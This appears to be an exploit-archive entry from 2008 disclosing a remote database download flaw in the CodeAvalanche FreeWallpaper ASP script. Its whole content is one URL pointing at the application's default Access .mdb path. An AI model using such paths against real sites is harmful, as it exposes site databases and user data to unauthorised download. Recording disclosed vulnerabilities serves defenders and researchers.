id: 4459
date: 12/15/2008
title: CodeAvalanche FreeWallpaper Remote Database Disclosure Vulnerability
author: Pouya_Server
cves: 

====================================================================
CodeAvalanche FreeWallpaper Remote Database Disclosure Vulnerability
====================================================================


#########################################################
---------------------------------------------------------
Portal Name: CAFreeWallpaper
Download : http://www.truecontent.info/codeavalanche/asp-freewallpaper-script.php
Author : Pouya_Server 
Vulnerability : (DD)
---------------------------------------------------------
#########################################################
[DD]:
http://site.com/[Path]/CAFreeWallpaper/_private/CAFreeWallpaper.mdb
 
---------------------------------



#  0day.today [2023-03-24]  #